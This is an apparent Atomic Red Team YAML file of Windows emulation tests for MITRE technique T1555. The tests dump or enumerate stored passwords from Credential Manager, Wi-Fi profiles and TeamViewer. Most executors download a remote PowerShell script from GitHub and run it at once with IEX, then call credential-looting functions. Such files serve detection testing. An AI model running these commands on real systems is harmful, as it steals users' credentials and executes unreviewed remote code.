attack_technique: T1555
display_name: 'Credentials from Password Stores'
atomic_tests:
- name: Extract Windows Credential Manager via VBA
  auto_generated_guid: 234f9b7c-b53d-4f32-897b-b880a6c9ea7b
  description: |
    This module will extract the credentials found within the Windows credential manager and dump
    them to $env:TEMP\windows-credentials.txt
  supported_platforms:
  - windows
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Microsoft Word must be installed
    prereq_command: |
      try {
        New-Object -COMObject "word.Application" | Out-Null
        $process = "winword"
        Stop-Process -Name $process
        exit 0
      } catch { exit 1 }
    get_prereq_command: |
      Write-Host "You will need to install Microsoft Word manually to meet this requirement"
  executor:
    command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
      Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract"
    cleanup_command: |
      Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore
    name: powershell
- name: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]
  auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3
  description: This module will extract the credentials from Windows Credential Manager
  supported_platforms:
  - windows
  executor:
    name: powershell
    elevation_required: false
    command: |
      IEX (IWR 'https://raw.githubusercontent.com/TriggerMan-S/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force   
- name: Dump credentials from Windows Credential Manager With PowerShell [web Credentials]
  auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240
  description: This module will extract the credentials from Windows Credential Manager
  supported_platforms:
  - windows
  executor:
    name: powershell
    elevation_required: false
    command: |
      IEX (IWR 'https://raw.githubusercontent.com/TriggerMan-S/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force
- name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] 
  auto_generated_guid: 36753ded-e5c4-4eb5-bc3c-e8fba236878d
  description: This module will enumerate credentials stored in Windows Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe
  supported_platforms:
  - windows
  executor:
    name: powershell
    elevation_required: false
    command: |
      vaultcmd /listcreds:"Windows Credentials" /all
- name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]
  auto_generated_guid: bc071188-459f-44d5-901a-f8f2625b2d2e
  description: This module will enumerate credentials stored in Web Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe
  supported_platforms:
  - windows
  executor:
    name: powershell
    elevation_required: false
    command: |
      vaultcmd /listcreds:"Web Credentials" /all
- name: WinPwn - Loot local Credentials - lazagne
  auto_generated_guid: 079ee2e9-6f16-47ca-a635-14efcd994118
  description: |-
    The [LaZagne project](https://github.com/AlessandroZ/LaZagne) is an open source application used to retrieve lots of passwords stored on a local computer. 
    Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). 
    This tool has been developed for the purpose of finding these passwords for the most commonly-used software
  supported_platforms:
  - windows
  executor:
    command: |-
      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
      lazagnemodule -consoleoutput -noninteractive
    name: powershell
- name: WinPwn - Loot local Credentials - Wifi Credentials
  auto_generated_guid: afe369c2-b42e-447f-98a3-fb1f4e2b8552
  description: Loot local Credentials - Wifi Credentials technique via function of WinPwn
  supported_platforms:
  - windows
  executor:
    command: |-
      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
      wificreds -consoleoutput -noninteractive  
    name: powershell
- name: WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords
  auto_generated_guid: db965264-3117-4bad-b7b7-2523b7856b92
  description: Loot local Credentials - Decrypt Teamviewer Passwords technique via function of WinPwn
  supported_platforms:
  - windows
  executor:
    command: |-
      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
      decryptteamviewer -consoleoutput -noninteractive  
    name: powershell